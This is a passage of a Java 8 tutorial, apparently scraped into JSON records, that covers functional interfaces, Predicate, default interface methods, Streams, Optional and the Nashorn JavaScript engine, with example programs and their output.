"Function<T,R>" }, { "code": null, "e": 16050, "s": 15979, "text": "Represents a function that accepts one argument and produces a result." }, { "code": null, "e": 16068, "s": 16050, "text": "IntBinaryOperator" }, { "code": null, "e": 16156, "s": 16068, "text": "Represents an operation upon two int-valued operands and produces an int-valued result." }, { "code": null, "e": 16168, "s": 16156, "text": "IntConsumer" }, { "code": null, "e": 16257, "s": 16168, "text": "Represents an operation that accepts a single int-valued argument and returns no result." }, { "code": null, "e": 16272, "s": 16257, "text": "IntFunction<R>" }, { "code": null, "e": 16353, "s": 16272, "text": "Represents a function that accepts an int-valued argument and produces a result." }, { "code": null, "e": 16366, "s": 16353, "text": "IntPredicate" }, { "code": null, "e": 16443, "s": 16366, "text": "Represents a predicate (Boolean-valued function) of one int-valued argument." }, { "code": null, "e": 16455, "s": 16443, "text": "IntSupplier" }, { "code": null, "e": 16500, "s": 16455, "text": "Represents a supplier of int-valued results." }, { "code": null, "e": 16520, "s": 16500, "text": "IntToDoubleFunction" }, { "code": null, "e": 16615, "s": 16520, "text": "Represents a function that accepts an int-valued argument and produces a double-valued result." }, { "code": null, "e": 16633, "s": 16615, "text": "IntToLongFunction" }, { "code": null, "e": 16726, "s": 16633, "text": "Represents a function that accepts an int-valued argument and produces a long-valued result." }, { "code": null, "e": 16743, "s": 16726, "text": "IntUnaryOperator" }, { "code": null, "e": 16834, "s": 16743, "text": "Represents an operation on a single int-valued operand that produces an int-valued result." }, { "code": null, "e": 16853, "s": 16834, "text": "LongBinaryOperator" }, { "code": null, "e": 16942, "s": 16853, "text": "Represents an operation upon two long-valued operands and produces a long-valued result." }, { "code": null, "e": 16955, "s": 16942, "text": "LongConsumer" }, { "code": null, "e": 17045, "s": 16955, "text": "Represents an operation that accepts a single long-valued argument and returns no result." }, { "code": null, "e": 17061, "s": 17045, "text": "LongFunction<R>" }, { "code": null, "e": 17142, "s": 17061, "text": "Represents a function that accepts a long-valued argument and produces a result." }, { "code": null, "e": 17156, "s": 17142, "text": "LongPredicate" }, { "code": null, "e": 17234, "s": 17156, "text": "Represents a predicate (Boolean-valued function) of one long-valued argument." }, { "code": null, "e": 17247, "s": 17234, "text": "LongSupplier" }, { "code": null, "e": 17293, "s": 17247, "text": "Represents a supplier of long-valued results." }, { "code": null, "e": 17314, "s": 17293, "text": "LongToDoubleFunction" }, { "code": null, "e": 17409, "s": 17314, "text": "Represents a function that accepts a long-valued argument and produces a double-valued result." }, { "code": null, "e": 17427, "s": 17409, "text": "LongToIntFunction" }, { "code": null, "e": 17520, "s": 17427, "text": "Represents a function that accepts a long-valued argument and produces an int-valued result." }, { "code": null, "e": 17538, "s": 17520, "text": "LongUnaryOperator" }, { "code": null, "e": 17630, "s": 17538, "text": "Represents an operation on a single long-valued operand that produces a long-valued result." }, { "code": null, "e": 17651, "s": 17630, "text": "ObjDoubleConsumer<T>" }, { "code": null, "e": 17758, "s": 17651, "text": "Represents an operation that accepts an object-valued and a double-valued argument, and returns no result." }, { "code": null, "e": 17776, "s": 17758, "text": "ObjIntConsumer<T>" }, { "code": null, "e": 17881, "s": 17776, "text": "Represents an operation that accepts an object-valued and an int-valued argument, and returns no result." }, { "code": null, "e": 17900, "s": 17881, "text": "ObjLongConsumer<T>" }, { "code": null, "e": 18005, "s": 17900, "text": "Represents an operation that accepts an object-valued and a long-valued argument, and returns no result." }, { "code": null, "e": 18018, "s": 18005, "text": "Predicate<T>" }, { "code": null, "e": 18084, "s": 18018, "text": "Represents a predicate (Boolean-valued function) of one argument." }, { "code": null, "e": 18096, "s": 18084, "text": "Supplier<T>" }, { "code": null, "e": 18130, "s": 18096, "text": "Represents a supplier of results." }, { "code": null, "e": 18154, "s": 18130, "text": "ToDoubleBiFunction<T,U>" }, { "code": null, "e": 18240, "s": 18154, "text": "Represents a function that accepts two arguments and produces a double-valued result." }, { "code": null, "e": 18260, "s": 18240, "text": "ToDoubleFunction<T>" }, { "code": null, "e": 18320, "s": 18260, "text": "Represents a function that produces a double-valued result." }, { "code": null, "e": 18341, "s": 18320, "text": "ToIntBiFunction<T,U>" }, { "code": null, "e": 18425, "s": 18341, "text": "Represents a function that accepts two arguments and produces an int-valued result." }, { "code": null, "e": 18442, "s": 18425, "text": "ToIntFunction<T>" }, { "code": null, "e": 18500, "s": 18442, "text": "Represents a function that produces an int-valued result." }, { "code": null, "e": 18522, "s": 18500, "text": "ToLongBiFunction<T,U>" }, { "code": null, "e": 18606, "s": 18522, "text": "Represents a function that accepts two arguments and produces a long-valued result." }, { "code": null, "e": 18624, "s": 18606, "text": "ToLongFunction<T>" }, { "code": null, "e": 18682, "s": 18624, "text": "Represents a function that produces a long-valued result." }, { "code": null, "e": 18699, "s": 18682, "text": "UnaryOperator<T>" }, { "code": null, "e": 18799, "s": 18699, "text": "Represents an operation on a single operand that produces a result of the same type as its operand." }, { "code": null, "e": 18974, "s": 18799, "text": "Predicate <T> interface is a functional interface with a method test(Object) to return a Boolean value. This interface signifies that an object is tested to be true or false." }, { "code": null, "e": 19060, "s": 18974, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 20369, "s": 19060, "text": "import java.util.Arrays;\nimport java.util.List;\nimport java.util.function.Predicate;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n List<Integer> list = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9);\n\t\t\n // Predicate<Integer> predicate = n -> true\n // n is passed as parameter to test method of Predicate interface\n // test method will always return true no matter what value n has.\n\t\t\n System.out.println(\"Print all numbers:\");\n\t\t\n //pass n as parameter\n eval(list, n->true);\n\t\t\n // Predicate<Integer> predicate1 = n -> n%2 == 0\n // n is passed as parameter to test method of Predicate interface\n // test method will return true if n%2 comes to be zero\n\t\t\n System.out.println(\"Print even numbers:\");\n eval(list, n-> n%2 == 0 );\n\t\t\n // Predicate<Integer> predicate2 = n -> n > 3\n // n is passed as parameter to test method of Predicate interface\n // test method will return true if n is greater than 3.\n\t\t\n System.out.println(\"Print numbers greater than 3:\");\n eval(list, n-> n > 3 );\n }\n\t\n public static void eval(List<Integer> list, Predicate<Integer> predicate) {\n\n for(Integer n: list) {\n\n if(predicate.test(n)) {\n System.out.println(n + \" \");\n }\n }\n }\n}" }, { "code": null, "e": 20456, "s": 20369, "text": "Here we've passed Predicate interface, which takes a single input and returns Boolean." }, { "code": null, "e": 20508, "s": 20456, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 20540, "s": 20508, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 20577, "s": 20540, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 20603, "s": 20577, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 20644, "s": 20603, "text": "It should produce the following output −" }, { "code": null, "e": 20752, "s": 20644, "text": "Print all numbers:\n1\n2\n3\n4\n5\n6\n7\n8\n9\nPrint even numbers:\n2\n4\n6\n8\nPrint numbers greater than 3:\n4\n5\n6\n7\n8\n9\n" }, { "code": null, "e": 20975, "s": 20752, "text": "Java 8 introduces a new concept of default method implementation in interfaces. This capability is added for backward compatibility so that old interfaces can be used to leverage the lambda expression capability of Java 8." }, { "code": null, "e": 21342, "s": 20975, "text": "For example, ‘List’ or ‘Collection’ interfaces do not have ‘forEach’ method declaration. Thus, adding such method will simply break the collection framework implementations. Java 8 introduces default method so that List/Collection interface can have a default implementation of forEach method, and the class implementing these interfaces need not implement the same." }, { "code": null, "e": 21449, "s": 21342, "text": "public interface vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n}\n" }, { "code": null, "e": 21645, "s": 21449, "text": "With default functions in interfaces, there is a possibility that a class is implementing two interfaces with same default methods. The following code explains how this ambiguity can be resolved." }, { "code": null, "e": 21867, "s": 21645, "text": "public interface vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n}\n\npublic interface fourWheeler {\n\n default void print() {\n System.out.println(\"I am a four wheeler!\");\n }\n}" }, { "code": null, "e": 21952, "s": 21867, "text": "First solution is to create an own method that overrides the default implementation." }, { "code": null, "e": 22098, "s": 21952, "text": "public class car implements vehicle, fourWheeler {\n\n public void print() {\n System.out.println(\"I am a four wheeler car vehicle!\");\n }\n}" }, { "code": null, "e": 22184, "s": 22098, "text": "Second solution is to call the default method of the specified interface using super." }, { "code": null, "e": 22297, "s": 22184, "text": "public class car implements vehicle, fourWheeler {\n\n public void print() {\n vehicle.super.print();\n }\n}" }, { "code": null, "e": 22367, "s": 22297, "text": "An interface can also have static helper methods from Java 8 onwards." }, { "code": null, "e": 22553, "s": 22367, "text": "public interface vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n\t\n static void blowHorn() {\n System.out.println(\"Blowing horn!!!\");\n }\n}" }, { "code": null, "e": 22639, "s": 22553, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 23272, "s": 22639, "text": "public class Java8Tester {\n\n public static void main(String args[]) {\n Vehicle vehicle = new Car();\n vehicle.print();\n }\n}\n\ninterface Vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n\t\n static void blowHorn() {\n System.out.println(\"Blowing horn!!!\");\n }\n}\n\ninterface FourWheeler {\n\n default void print() {\n System.out.println(\"I am a four wheeler!\");\n }\n}\n\nclass Car implements Vehicle, FourWheeler {\n\n public void print() {\n Vehicle.super.print();\n FourWheeler.super.print();\n Vehicle.blowHorn();\n System.out.println(\"I am a car!\");\n }\n}" }, { "code": null, "e": 23324, "s": 23272, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 23356, "s": 23324, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 23393, "s": 23356, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 23419, "s": 23393, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 23460, "s": 23419, "text": "It should produce the following output −" }, { "code": null, "e": 23526, "s": 23460, "text": "I am a vehicle!\nI am a four wheeler!\nBlowing horn!!!\nI am a car!\n" }, { "code": null, "e": 23713, "s": 23526, "text": "Stream is a new abstract layer introduced in Java 8. Using stream, you can process data in a declarative way similar to SQL statements. For example, consider the following SQL statement." }, { "code": null, "e": 23774, "s": 23713, "text": "SELECT max(salary), employee_id, employee_name FROM Employee" }, { "code": null, "e": 24174, "s": 23774, "text": "The above SQL expression automatically returns the maximum salaried employee's details, without doing any computation on the developer's end. Using collections framework in Java, a developer has to use loops and make repeated checks. Another concern is efficiency; as multi-core processors are available at ease, a Java developer has to write parallel code processing that can be pretty error-prone." }, { "code": null, "e": 24380, "s": 24174, "text": "To resolve such issues, Java 8 introduced the concept of stream that lets the developer to process data declaratively and leverage multicore architecture without the need to write any specific code for it." }, { "code": null, "e": 24520, "s": 24380, "text": "Stream represents a sequence of objects from a source, which supports aggregate operations. Following are the characteristics of a Stream −" }, { "code": null, "e": 24693, "s": 24520, "text": "Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements." }, { "code": null, "e": 24866, "s": 24693, "text": "Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements." }, { "code": null, "e": 24943, "s": 24866, "text": "Source − Stream takes Collections, Arrays, or I/O resources as input source." }, { "code": null, "e": 25020, "s": 24943, "text": "Source − Stream takes Collections, Arrays, or I/O resources as input source." }, { "code": null, "e": 25137, "s": 25020, "text": "Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on." }, { "code": null, "e": 25254, "s": 25137, "text": "Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on." }, { "code": null, "e": 25630, "s": 25254, "text": "Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream." }, { "code": null, "e": 26006, "s": 25630, "text": "Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream." }, { "code": null, "e": 26176, "s": 26006, "text": "Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required." }, { "code": null, "e": 26346, "s": 26176, "text": "Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required." }, { "code": null, "e": 26418, "s": 26346, "text": "With Java 8, Collection interface has two methods to generate a Stream." }, { "code": null, "e": 26495, "s": 26418, "text": "stream() − Returns a sequential stream considering collection as its source." }, { "code": null, "e": 26572, "s": 26495, "text": "stream() − Returns a sequential stream considering collection as its source." }, { "code": null, "e": 26655, "s": 26572, "text": "parallelStream() − Returns a parallel Stream considering collection as its source." }, { "code": null, "e": 26738, "s": 26655, "text": "parallelStream() − Returns a parallel Stream considering collection as its source." }, { "code": null, "e": 26925, "s": 26738, "text": "List<String> strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\nList<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList());" }, { "code": null, "e": 27086, "s": 26925, "text": "Stream has provided a new method ‘forEach’ to iterate each element of the stream. The following code segment shows how to print 10 random numbers using forEach." }, { "code": null, "e": 27170, "s": 27086, "text": "Random random = new Random();\nrandom.ints().limit(10).forEach(System.out::println);" }, { "code": null, "e": 27315, "s": 27170, "text": "The ‘map’ method is used to map each element to its corresponding result. The following code segment prints unique squares of numbers using map." }, { "code": null, "e": 27506, "s": 27315, "text": "List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5);\n\n//get list of unique squares\nList<Integer> squaresList = numbers.stream().map( i -> i*i).distinct().collect(Collectors.toList());" }, { "code": null, "e": 27650, "s": 27506, "text": "The ‘filter’ method is used to eliminate elements based on a criteria. The following code segment prints a count of empty strings using filter." }, { "code": null, "e": 27831, "s": 27650, "text": "List<String>strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\n\n//get count of empty string\nint count = strings.stream().filter(string -> string.isEmpty()).count();" }, { "code": null, "e": 27969, "s": 27831, "text": "The ‘limit’ method is used to reduce the size of the stream. The following code segment shows how to print 10 random numbers using limit." }, { "code": null, "e": 28053, "s": 27969, "text": "Random random = new Random();\nrandom.ints().limit(10).forEach(System.out::println);" }, { "code": null, "e": 28184, "s": 28053, "text": "The ‘sorted’ method is used to sort the stream. The following code segment shows how to print 10 random numbers in a sorted order." }, { "code": null, "e": 28277, "s": 28184, "text": "Random random = new Random();\nrandom.ints().limit(10).sorted().forEach(System.out::println);" }, { "code": null, "e": 28447, "s": 28277, "text": "parallelStream is the alternative of stream for parallel processing. Take a look at the following code segment that prints a count of empty strings using parallelStream." }, { "code": null, "e": 28638, "s": 28447, "text": "List<String> strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\n\n//get count of empty string\nlong count = strings.parallelStream().filter(string -> string.isEmpty()).count();" }, { "code": null, "e": 28705, "s": 28638, "text": "It is very easy to switch between sequential and parallel streams." }, { "code": null, "e": 28843, "s": 28705, "text": "Collectors are used to combine the result of processing on the elements of a stream. Collectors can be used to return a list or a string." }, { "code": null, "e": 29244, "s": 28843, "text": "List<String>strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\nList<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList());\n\nSystem.out.println(\"Filtered List: \" + filtered);\nString mergedString = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.joining(\", \"));\nSystem.out.println(\"Merged String: \" + mergedString);" }, { "code": null, "e": 29360, "s": 29244, "text": "With Java 8, statistics collectors are introduced to calculate all statistics when stream processing is being done." }, { "code": null, "e": 29762, "s": 29360, "text": "List numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5);\n\nIntSummaryStatistics stats = numbers.stream().mapToInt((x) -> x).summaryStatistics();\n\nSystem.out.println(\"Highest number in List : \" + stats.getMax());\nSystem.out.println(\"Lowest number in List : \" + stats.getMin());\nSystem.out.println(\"Sum of all numbers : \" + stats.getSum());\nSystem.out.println(\"Average of all numbers : \" + stats.getAverage());" }, { "code": null, "e": 29848, "s": 29762, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 35861, "s": 29848, "text": "import java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.IntSummaryStatistics;\nimport java.util.List;\nimport java.util.Random;\nimport java.util.stream.Collectors;\nimport java.util.Map;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n System.out.println(\"Using Java 7: \");\n\t\t\n // Count empty strings\n List<String> strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\n System.out.println(\"List: \" +strings);\n long count = getCountEmptyStringUsingJava7(strings);\n\t\t\n System.out.println(\"Empty Strings: \" + count);\n count = getCountLength3UsingJava7(strings);\n\t\t\n System.out.println(\"Strings of length 3: \" + count);\n\t\t\n //Eliminate empty string\n List<String> filtered = deleteEmptyStringsUsingJava7(strings);\n System.out.println(\"Filtered List: \" + filtered);\n\t\t\n //Eliminate empty string and join using comma.\n String mergedString = getMergedStringUsingJava7(strings,\", \");\n System.out.println(\"Merged String: \" + mergedString);\n List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5);\n\t\t\n //get list of square of distinct numbers\n List<Integer> squaresList = getSquares(numbers);\n System.out.println(\"Squares List: \" + squaresList);\n List<Integer> integers = Arrays.asList(1,2,13,4,15,6,17,8,19);\n\t\t\n System.out.println(\"List: \" +integers);\n System.out.println(\"Highest number in List : \" + getMax(integers));\n System.out.println(\"Lowest number in List : \" + getMin(integers));\n System.out.println(\"Sum of all numbers : \" + getSum(integers));\n System.out.println(\"Average of all numbers : \" + getAverage(integers));\n System.out.println(\"Random Numbers: \");\n\t\t\n //print ten random numbers\n Random random = new Random();\n\t\t\n for(int i = 0; i < 10; i++) {\n System.out.println(random.nextInt());\n }\n\t\t\n System.out.println(\"Using Java 8: \");\n System.out.println(\"List: \" +strings);\n\t\t\n count = strings.stream().filter(string->string.isEmpty()).count();\n System.out.println(\"Empty Strings: \" + count);\n\t\t\n count = strings.stream().filter(string -> string.length() == 3).count();\n System.out.println(\"Strings of length 3: \" + count);\n\t\t\n filtered = strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.toList());\n System.out.println(\"Filtered List: \" + filtered);\n\t\t\n mergedString = strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.joining(\", \"));\n System.out.println(\"Merged String: \" + mergedString);\n\t\t\n squaresList = numbers.stream().map( i ->i*i).distinct().collect(Collectors.toList());\n System.out.println(\"Squares List: \" + squaresList);\n System.out.println(\"List: \" +integers);\n\t\t\n IntSummaryStatistics stats = integers.stream().mapToInt((x) ->x).summaryStatistics();\n\t\t\n System.out.println(\"Highest number in List : \" + stats.getMax());\n System.out.println(\"Lowest number in List : \" + stats.getMin());\n System.out.println(\"Sum of all numbers : \" + stats.getSum());\n System.out.println(\"Average of all numbers : \" + stats.getAverage());\n System.out.println(\"Random Numbers: \");\n\t\t\n random.ints().limit(10).sorted().forEach(System.out::println);\n\t\t\n //parallel processing\n count = strings.parallelStream().filter(string -> string.isEmpty()).count();\n System.out.println(\"Empty Strings: \" + count);\n }\n\t\n private static int getCountEmptyStringUsingJava7(List<String> strings) {\n int count = 0;\n\n for(String string: strings) {\n\t\t\n if(string.isEmpty()) {\n count++;\n }\n }\n return count;\n }\n\t\n private static int getCountLength3UsingJava7(List<String> strings) {\n int count = 0;\n\t\t\n for(String string: strings) {\n\t\t\n if(string.length() == 3) {\n count++;\n }\n }\n return count;\n }\n\t\n private static List<String> deleteEmptyStringsUsingJava7(List<String> strings) {\n List<String> filteredList = new ArrayList<String>();\n\t\t\n for(String string: strings) {\n\t\t\n if(!string.isEmpty()) {\n filteredList.add(string);\n }\n }\n return filteredList;\n }\n\t\n private static String getMergedStringUsingJava7(List<String> strings, String separator) {\n StringBuilder stringBuilder = new StringBuilder();\n\t\t\n for(String string: strings) {\n\t\t\n if(!string.isEmpty()) {\n stringBuilder.append(string);\n stringBuilder.append(separator);\n }\n }\n String mergedString = stringBuilder.toString();\n return mergedString.substring(0, mergedString.length()-2);\n }\n\t\n private static List<Integer> getSquares(List<Integer> numbers) {\n List<Integer> squaresList = new ArrayList<Integer>();\n\t\t\n for(Integer number: numbers) {\n Integer square = new Integer(number.intValue() * number.intValue());\n\t\t\t\n if(!squaresList.contains(square)) {\n squaresList.add(square);\n }\n }\n return squaresList;\n }\n\t\n private static int getMax(List<Integer> numbers) {\n int max = numbers.get(0);\n\t\t\n for(int i = 1;i < numbers.size();i++) {\n\t\t\n Integer number = numbers.get(i);\n\t\t\t\n if(number.intValue() > max) {\n max = number.intValue();\n }\n }\n return max;\n }\n\t\n private static int getMin(List<Integer> numbers) {\n int min = numbers.get(0);\n\t\t\n for(int i= 1;i < numbers.size();i++) {\n Integer number = numbers.get(i);\n\t\t\n if(number.intValue() < min) {\n min = number.intValue();\n }\n }\n return min;\n }\n\t\n private static int getSum(List numbers) {\n int sum = (int)(numbers.get(0));\n\t\t\n for(int i = 1;i < numbers.size();i++) {\n sum += (int)numbers.get(i);\n }\n return sum;\n }\n\t\n private static int getAverage(List<Integer> numbers) {\n return getSum(numbers) / numbers.size();\n }\n}" }, { "code": null, "e": 35913, "s": 35861, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 35945, "s": 35913, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 35982, "s": 35945, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 36008, "s": 35982, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 36049, "s": 36008, "text": "It should produce the following result −" }, { "code": null, "e": 37013, "s": 36049, "text": "Using Java 7:\nList: [abc, , bc, efg, abcd, , jkl]\nEmpty Strings: 2\nStrings of length 3: 3\nFiltered List: [abc, bc, efg, abcd, jkl]\nMerged String: abc, bc, efg, abcd, jkl\nSquares List: [9, 4, 49, 25]\nList: [1, 2, 13, 4, 15, 6, 17, 8, 19]\nHighest number in List : 19\nLowest number in List : 1\nSum of all numbers : 85\nAverage of all numbers : 9\nRandom Numbers:\n-1279735475\n903418352\n-1133928044\n-1571118911\n628530462\n18407523\n-881538250\n-718932165\n270259229\n421676854\nUsing Java 8:\nList: [abc, , bc, efg, abcd, , jkl]\nEmpty Strings: 2\nStrings of length 3: 3\nFiltered List: [abc, bc, efg, abcd, jkl]\nMerged String: abc, bc, efg, abcd, jkl\nSquares List: [9, 4, 49, 25]\nList: [1, 2, 13, 4, 15, 6, 17, 8, 19]\nHighest number in List : 19\nLowest number in List : 1\nSum of all numbers : 85\nAverage of all numbers : 9.444444444444445\nRandom Numbers:\n-1009474951\n-551240647\n-2484714\n181614550\n933444268\n1227850416\n1579250773\n1627454872\n1683033687\n1798939493\nEmpty Strings: 2\n" }, { "code": null, "e": 37353, "s": 37013, "text": "Optional is a container object used to contain not-null objects. Optional object is used to represent null with absent value. This class has various utility methods to facilitate code to handle values as ‘available’ or ‘not available’ instead of checking null values. It is introduced in Java 8 and is similar to what Optional is in Guava." }, { "code": null, "e": 37416, "s": 37353, "text": "Following is the declaration for java.util.Optional<T> class −" }, { "code": null, "e": 37463, "s": 37416, "text": "public final class Optional<T> extends Object\n" }, { "code": null, "e": 37494, "s": 37463, "text": "static <T> Optional<T> empty()" }, { "code": null, "e": 37530, "s": 37494, "text": "Returns an empty Optional instance." }, { "code": null, "e": 37557, "s": 37530, "text": "boolean equals(Object obj)" }, { "code": null, "e": 37622, "s": 37557, "text": "Indicates whether some other object is \"equal to\" this Optional." }, { "code": null, "e": 37674, "s": 37622, "text": "Optional<T> filter(Predicate<? super <T> predicate)" }, { "code": null, "e": 37819, "s": 37674, "text": "If a value is present and the value matches a given predicate, it returns an Optional describing the value, otherwise returns an empty Optional." }, { "code": null, "e": 37883, "s": 37819, "text": "<U> Optional<U> flatMap(Function<? super T,Optional<U>> mapper)" }, { "code": null, "e": 38029, "s": 37883, "text": "If a value is present, it applies the provided Optional-bearing mapping function to it, returns that result, otherwise returns an empty Optional." }, { "code": null, "e": 38037, "s": 38029, "text": "T get()" }, { "code": null, "e": 38137, "s": 38037, "text": "If a value is present in this Optional, returns the value, otherwise throws NoSuchElementException." }, { "code": null, "e": 38152, "s": 38137, "text": "int hashCode()" }, { "code": null, "e": 38246, "s": 38152, "text": "Returns the hash code value of the present value, if any, or 0 (zero) if no value is present." }, { "code": null, "e": 38291, "s": 38246, "text": "void ifPresent(Consumer<? super T> consumer)" }, { "code": null, "e": 38388, "s": 38291, "text": "If a value is present, it invokes the specified consumer with the value, otherwise does nothing." }, { "code": null, "e": 38408, "s": 38388, "text": "boolean isPresent()" }, { "code": null, "e": 38467, "s": 38408, "text": "Returns true if there is a value present, otherwise false." }, { "code": null, "e": 38526, "s": 38467, "text": "<U>Optional<U> map(Function<? super T,? extends U> mapper)" }, { "code": null, "e": 38668, "s": 38526, "text": "If a value is present, applies the provided mapping function to it, and if the result is non-null, returns an Optional describing the result." }, { "code": null, "e": 38703, "s": 38668, "text": "static <T> Optional<T> of(T value)" }, { "code": null, "e": 38766, "s": 38703, "text": "Returns an Optional with the specified present non-null value." }, { "code": null, "e": 38809, "s": 38766, "text": "static <T> Optional<T> ofNullable(T value)" }, { "code": null, "e": 38911, "s": 38809, "text": "Returns an Optional describing the specified value, if non-null, otherwise returns an empty Optional." }, { "code": null, "e": 38929, "s": 38911, "text": "T orElse(T other)" }, { "code": null, "e": 38984, "s": 38929, "text": "Returns the value if present, otherwise returns other." }, { "code": null, "e": 39025, "s": 38984, "text": "T orElseGet(Supplier<? extends T> other)" }, { "code": null, "e": 39122, "s": 39025, "text": "Returns the value if present, otherwise invokes other and returns the result of that invocation." }, { "code": null, "e": 39199, "s": 39122, "text": "<X extends Throwable> T orElseThrow(Supplier<? extends X> exceptionSupplier)" }, { "code": null, "e": 39310, "s": 39199, "text": "Returns the contained value, if present, otherwise throws an exception to be created by the provided supplier." }, { "code": null, "e": 39328, "s": 39310, "text": "String toString()" }, { "code": null, "e": 39411, "s": 39328, "text": "Returns a non-empty string representation of this Optional suitable for debugging." }, { "code": null, "e": 39466, "s": 39411, "text": "This class inherits methods from the following class −" }, { "code": null, "e": 39483, "s": 39466, "text": "java.lang.Object" }, { "code": null, "e": 39569, "s": 39483, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 40676, "s": 39569, "text": "import java.util.Optional;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8Tester = new Java8Tester();\n Integer value1 = null;\n Integer value2 = new Integer(10);\n\t\t\n //Optional.ofNullable - allows passed parameter to be null.\n Optional<Integer> a = Optional.ofNullable(value1);\n\t\t\n //Optional.of - throws NullPointerException if passed parameter is null\n Optional<Integer> b = Optional.of(value2);\n System.out.println(java8Tester.sum(a,b));\n }\n\t\n public Integer sum(Optional<Integer> a, Optional<Integer> b) {\n //Optional.isPresent - checks the value is present or not\n\t\t\n System.out.println(\"First parameter is present: \" + a.isPresent());\n System.out.println(\"Second parameter is present: \" + b.isPresent());\n\t\t\n //Optional.orElse - returns the value if present otherwise returns\n //the default value passed.\n Integer value1 = a.orElse(new Integer(0));\n\t\t\n //Optional.get - gets the value, value should be present\n Integer value2 = b.get();\n return value1 + value2;\n }\n}" }, { "code": null, "e": 40728, "s": 40676, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 40760, "s": 40728, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 40797, "s": 40760, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 40823, "s": 40797, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 40864, "s": 40823, "text": "It should produce the following output −" }, { "code": null, "e": 40936, "s": 40864, "text": "First parameter is present: false\nSecond parameter is present: true\n10\n" }, { "code": null, "e": 41247, "s": 40936, "text": "With Java 8, Nashorn, a much improved javascript engine is introduced, to replace the existing Rhino. Nashorn provides 2 to 10 times better performance, as it directly compiles the code in memory and passes the bytecode to JVM. Nashorn uses invoke dynamics feature, introduced in Java 7 to improve performance." }, { "code": null, "e": 41355, "s": 41247, "text": "For Nashorn engine, JAVA 8 introduces a new command line tool, jjs, to execute javascript codes at console." }, { "code": null, "e": 41411, "s": 41355, "text": "Create and save the file sample.js in c:\\> JAVA folder." }, { "code": null, "e": 41434, "s": 41411, "text": "print('Hello World!');" }, { "code": null, "e": 41478, "s": 41434, "text": "Open console and use the following command." }, { "code": null, "e": 41501, "s": 41478, "text": "C:\\JAVA>jjs sample.js\n" }, { "code": null, "e": 41539, "s": 41501, "text": "It will produce the following output:" }, { "code": null, "e": 41553, "s": 41539, "text": "Hello World!\n" }, { "code": null, "e": 41601, "s": 41553, "text": "Open the console and use the following command." }, { "code": null, "e": 41671, "s": 41601, "text": "C:\\JAVA>jjs\njjs> print(\"Hello, World!\")\nHello, World!\njjs> quit()\n>>\n" }, { "code": null, "e": 41719, "s": 41671, "text": "Open the console and use the following command." }, { "code": null, "e": 41810, "s": 41719, "text": "C:\\JAVA> jjs -- a b c\njjs> print('letters: ' +arguments.join(\", \"))\nletters: a, b, c\njjs>\n" }, { "code": null, "e": 41892, "s": 41810, "text": "Using ScriptEngineManager, JavaScript code can be called and interpreted in Java." }, { "code": null, "e": 41978, "s": 41892, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 42674, "s": 41978, "text": "import 